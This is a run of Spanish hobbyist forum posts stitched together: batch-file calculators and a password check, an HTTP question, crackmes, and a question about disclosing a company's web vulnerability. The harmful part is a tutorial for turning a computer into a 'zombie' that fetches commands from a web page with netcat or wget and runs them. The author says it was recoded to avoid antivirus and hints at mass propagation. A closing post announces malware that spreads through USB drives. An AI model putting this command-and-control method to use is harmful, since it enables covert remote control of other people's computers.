Saludos, desde hace bastante tiempo tengo una duda existencial si deberia comunicar a una "Gran empresa" de este pais una Vuln que tiene en su aplicacion web, la cual da acceso a todos los usuarios y servicios de la empresa, tienen un comunicado puesto mencionando que en la antiguedad han intentado estafarla y por eso me da yuyu haber si voy a ir de buenas y me van a tomar por cabeza de turko, e pensado comunicarselo iwal a traves de la red TOR para proteger mi IP en lo posible que opinais, deberia exponerme u no ?

Esta comunidad a descubierto varias vuln muy importantes , tonces creo que sabeis obrar mejor que yo en estos lares, pido consejo porfis 

Un saludo

AFCDAFC43D  3DCDAD3434 34AF1D3232 AFCD1BAFAF AF3D323D3D 3DABABC2ED 3F124AABE4

Cifrado con lapiz y papel


Descifrenlo y Respondan correctamente   

Saludos, e codeado este filtro anti inyecciones y me preguntaba si tiene fallas pues yo no se las veo, lo dejo por si quereis testarlo. Intentad ejecutar algun comando que no este en el script haber si podeis  


Un saludo gente  

@echo off
:uno
set "Pss="
cls
echo Ingresa el password:
set /p Pss= 
for /f "tokens=1" %%a in ('set ^| find /i "Pss"') do ( if "%%a" EQU "Pss=1001" (echo 
 
bien && pause >nul && goto uno) else (echo mal && pause >nul && goto uno)) || 
 
echo mal && pause >nul && goto uno
echo mal && pause >nul
goto uno
 

En esta segunda version e ampliado el comando hasta las cuatro acciones aritmeticas basicas (Sumar, restar, multiplicar y dividir) con numeros reales, quiero avisar antes de que se me hechen al cuello de que el segundo decimal no suele ser totalmente exacto hay una variacion respecto a una calculadora, esto se deve a que CMD tiende a redondear los resultados cuando la operacion no devuelve un numero entero por lo demas va medianamente bien, os dejo el codigo para que le hecheis un vistazo.

Sintaxis:

@echo on
set operador=%3
set /a cont=-1
set /a cont2=-1
set /a cont3=-1
for /f "tokens=*" %%a in ('set /a "operando1=%1,%2"') do ( set decimales1=%%a)
for /f "tokens=*" %%b in ('set /a "operando2=%4,%5"') do (set decimales2=%%b)
for /f "tokens=*" %%c in ('echo %1') do ( set entero1=%%c)
for /f "tokens=*" %%d in ('echo %4') do ( set entero2=%%d)
if "^%operador%s" == "^+s" (goto sumar)
if "^%operador%s" == "^-s" (goto restar)
if "^%operador%s" == "^*s" (goto multiplicar)
if "^%operador%s" == "^/s" (goto dividir)
 
:sumar
set /a RsEntero=%entero1% %operador% %entero2%
set /a RsDecimal=%decimales1% %operador% %decimales2%
if "100" GEQ "%RsDecimal%" (set /a "RsEntero=%RsEntero% + %RsDecimal:~0,1%")
set "resultado=%RsEntero%,%RsDecimal%"
echo %resultado%
exit /b %resultado%
 
:restar
set /a RsEntero=%entero1% %operador% %entero2%
set /a RsDecimal=%decimales1% %operador% %decimales2%
if "%decimales1%" LSS "%decimales2%" (set "decimales1=1%decimales1%" & set /a "entero1=%entero1%-1" & goto uno)
if "%decimales2%" LSS "%decimales1%" (set "decimales2=1%decimales2%" & set /a "entero2=%entero2%-1" & goto dos)
 
:uno
set /a RsDecimal=%decimales1%- %decimales2%
set /a RsEntero=%entero2%%operador%%entero1%
set resultado=%RsEntero%,%RsDecimal%
echo %resultado%
exit /b %resultado%
 
:dos
set /a RsDecimal=%decimales2%- %decimales1%
set /a RsEntero=%entero2%%operador%%entero1%
set resultado=-%RsEntero%,%RsDecimal%
echo %resultado%
exit /b %resultado%
 
:multiplicar
set /a RsEntero=%entero1% %operador% %entero2%
set /a RsDecimal=%decimales1% %operador% %decimales2%
set line1=%entero1%%decimales1%
set line2=%entero2%%decimales2%
set /a RsTotal= %line1% * %line2%
set "resultado=%RsTotal:~0,-4%,%RsTotal:~-4%"
echo %resultado%
exit /b %resultado%
 
:dividir
set /a Dividendo=%entero1%%decimales1%
set /a Divisor=%entero2%%decimales2%
if "%Dividendo%" GTR "%Divisor%" (goto cuatro) else (set "Dividendo=%Dividendo%0" & goto tres) 
 
 
:tres
for /l %%g in (%Dividendo%,-%Divisor%,0) do (
	set /a cont=!cont! + 1  
	if "%%g" LSS "%Divisor%" (set Resto=%%g ) )
for /l %%h in (%Resto%0,-%Divisor%,0) do (
	set /a cont2=%cont2% + 1
	if "%%h" LSS "%Divisor%" (set Resto=%%h0) )
for /l %%_ in (%Resto%,-%Divisor%,0) do (
	set /a cont3=%cont3% + 1
	if "%%_" LSS "%Divisor%" (set Resto=%%_) )
pause
set resultado=0,%cont:-=%%cont2:-=%%cont3:-=% 
echo %resultado% 
exit /b %resultado% 
 
:cuatro
for /l %%i in (%Dividendo%,-%Divisor%,0) do (
	set /a cont+=1 
	if "%%i" LSS "%Divisor%" (set Resto=%%i0 ) )
for /l %%j in (%Resto%,-%Divisor%,0) do (
	set /a cont2+=1
	if "%%j" LSS "%Divisor%" (set Resto=%%j0) )
for /l %%k in (%Resto%,-%Divisor%,0) do (
	set /a cont3+=1
	if "%%k" LSS "%Divisor%" (set Resto=%%k) )
set resultado=%cont%,%cont2%%cont3%  
echo %resultado% 
exit /b %resultado% 
 

Tambien, y derivado del float e creado otro code para realizar raices cuadradas decimales, tmb tiene error por redondeo pero menos es nada XD

Sintaxis:

@echo on
set "pam=%*"
set pam2=%2
set pam2=%pam2:~0,1%
set RefEntera=-1
set RefDecimal=-1
set cont=0
set cont2=0
set cont3=0
goto uno
 
:uno
set /a RefEntera= %RefEntera% + 1
set /a cont=%cont% + 1
set /a BaseEntera= %cont% * %cont%
if %BaseEntera% GTR %1 (goto dos) 
if %BaseEntera% GTR %1 (goto dos)
if %BaseEntera% EQU %1%2 (echo %cont% & exit /b) else (goto uno)
 
 
:dos
pushd "%windir%\system32"
set /a RefDecimal=%RefDecimal% + 1
set /a cont3=%cont3% + 1
for /f "tokens=*" %%a in ('float.bat %RefEntera%,%cont3% * %RefEntera%,%cont3%') do (
	set res=%%a) 
set res=%res:,=%
set res=%res:~-6%
if %res% EQU %pam:,=% (echo %cont3%)
if %res% GTR %pam:,=% (echo %RefEntera%,%RefDecimal:~0,1%%res:~0,1% & pause & exit /b) 
goto dos
 
 

Espero os resulte util o por lo menos curioso XD!!

Un saludo gente ^^

Con este script podremos sumar y restar con dos decimales por lo menos , el code funciona bastante bien, despues de bastantes errores en el algoritmo creo haberlo afinado haunque si veis errores en los resultados me gustaria que pusierais las cantidades con las que habeis operado para estudiar el comportamiento y corregir el algoritmo, bueno espero que os sirva

La sintasix seria por ejemplo:


Este es el codigo resultante

@echo off
set operador=%3
for /f "tokens=*" %%a in ('set /a "operando1=%1,%2"') do ( set decimales1=%%a)
for /f "tokens=*" %%b in ('set /a "operando2=%4,%5"') do (set decimales2=%%b)
for /f "tokens=*" %%c in ('echo %1') do ( set entero1=%%c)
for /f "tokens=*" %%d in ('echo %4') do ( set entero2=%%d)
set /a RsEntero=%entero1% %operador% %entero2%
set /a RsDecimal=%decimales1% %operador% %decimales2%
if "^%operador%s" == "^+s" (goto sumar)
if "^%operador%s" == "^-s" (goto restar)
 
:sumar
if "100" GEQ "%RsDecimal%" (set /a "RsEntero=%RsEntero% + %RsDecimal:~0,1%")
set "resultado=%RsEntero%,%RsDecimal%"
echo %resultado%
exit /b %resultado%
 
:restar
if "%decimales1%" LSS "%decimales2%" (set "decimales1=1%decimales1%" & set /a "entero1=%entero1%-1" & goto uno)
if "%decimales2%" LSS "%decimales1%" (set "decimales2=1%decimales2%" & set /a "entero2=%entero2%-1" & goto dos)
 
:uno
set /a RsDecimal=%decimales1%- %decimales2%
set /a RsEntero=%entero2%%operador%%entero1%
set resultado=%RsEntero%,%RsDecimal%
echo %resultado%
exit /b %resultado%
 
:dos
set /a RsDecimal=%decimales2%- %decimales1%
set /a RsEntero=%entero2%%operador%%entero1%
set resultado=-%RsEntero%,%RsDecimal%
echo %resultado%
exit /b %resultado%
 
 
 
 
 
 

Espero que os guste, un saludo gente

Hola gente

Tengo un problemilla que me tiene un poco atascado, os expongo la situacion, estpy estudiando el protocolo HTTP y el asunto trata de que intento modificar el dontenido de un formilario dentro de una pagina mediante el metodo POST, puesto que es el unico que acepta, para ello en copiado la mediante "Live HTTP headers" la cabecera a un texto e intento mandarlo a traves del NC tal que asi

type "head.txt" | nc -vn IP Puerto
 

Optengo un Bad Request (400) pero viene con un comentario que no acabo de entender


Mi pregunta es que campo no se encuentra?, si es una replica de la cabecera mandada por el firefox, como me tiene desconcertado , acudo a vosotros los sabios, haber si podeis encaminar a este pobre profano

Bueno me e animado a subir este pequeño manual para volver "zombi" cualquier ordenado y que ejecute nuestras ordenes lo que denominare (ya que no se su denominacion tecnica) una conexion indirecta ya que nosotros dejaremos la orden en un sitio y el zombi la recogera y ejecutara, aviso que todo lo hago con batch + wget , inicialmente lo codifique utilizando netcat pero para llamar menos la atencion de los AV lo recodifique con wget


Bueno basicamente es aprovechar cualquier campo fijo (pero actualizable) para poner nuestro comando, para poder aislar la linea que contiene nuestro comando deberemos añadir una cadena singular usease una cadena unica que no se repita en el codigo fuente de la pagina a la que llamaremos

Explicare la manera de hacerlo con Netcat tmb para quede completo XD!!

Si utilizamos netcat deveremos guardar la URL en una variable <<EXCLUIENDO los caracteres ( & ) importante!! >>

Si la URL seleccionada tuviera dichos caracteres separariamos la URL en diferentes variables





Esta URL se podria directamente en una variable

set "URL=http://webPortadora/campo/archivo.html"

Esta otra URL habria que separarla

Código:



Dejandola en tres variables

Código:

set "url1=http://webPortadora/index.php?id=1"
set "url2=u=10"
set "url3=z=3"

Una vez tenemos la url dentro de una variable realizamos la peticion de la pag y aislamos la linea que nos interesa utilizando la cadena singular, recordais ... Cheesy

echo GET %URL%| nc -vn IP(webportadora) 80 | find "CadenaSingular"
o
echo GET "%url1%&%url2%&%url3%" | nc -vn IP(webportadora) 80 | find "CadenaSingular"

Por precaucion contra lammers dire que este code deberia encerrarse dentro de un FOR /F  para poder meter el resultado de la salida del COMANDO en una variable

Como la linea de la pagina a la que llamamos aparte de nuestro codigo tmb tiene su propio codigo html tendremos que recortarle los extremos a la variable tal que asi

Código:

 

set resultado=%resultado:~X,-Y%

Donde (X) seria el cacho que quitamos al principio y (-Y) seria el cacho que le comeremos al final una vez que tenemos el comando en una variable ejecutarlo es una cosa trivial

Con WGET la cosa es casi iwal con la excepcion de que wget guarda el resultado en un archivo el cual llamamos con un FOR /F y guardamos el resultado de la salida en la variable, la recortamos y ya tenemos el comando
nuevamente listo para que lo ejecutemos.


Imaginad con un buen metodo de propagacion .......


Espero os haya servido de algo

Un saludo  

Bueno si a alguien le interesan los crackmes aqui os dejo uno haber si conseguis sacar el pass




Un saludo gente

Bueno e codeado mi primer crackme, los expertos os descojonareis de lo facil que es pero sed comprensivos que es el primero XD!!

Resultado por MP Animaos!!

Un saludoo   

http://rapidshare.com/files/286200858/LauBuru.rar.htm

Bueno estoy codeando un malware que no estya terminado, e optado por el metodo de propagacion a traves de unidades extraibles (USB,SlimCard,Memory Stick,etc...)
Os dejo un script para detectar e copyar archivos en unidades extraible, pruebenlo haber que les parece, no creo que haya errores pues funciona perfectamente, pero si encuentran algo diganmelo porfa

Un saludo gente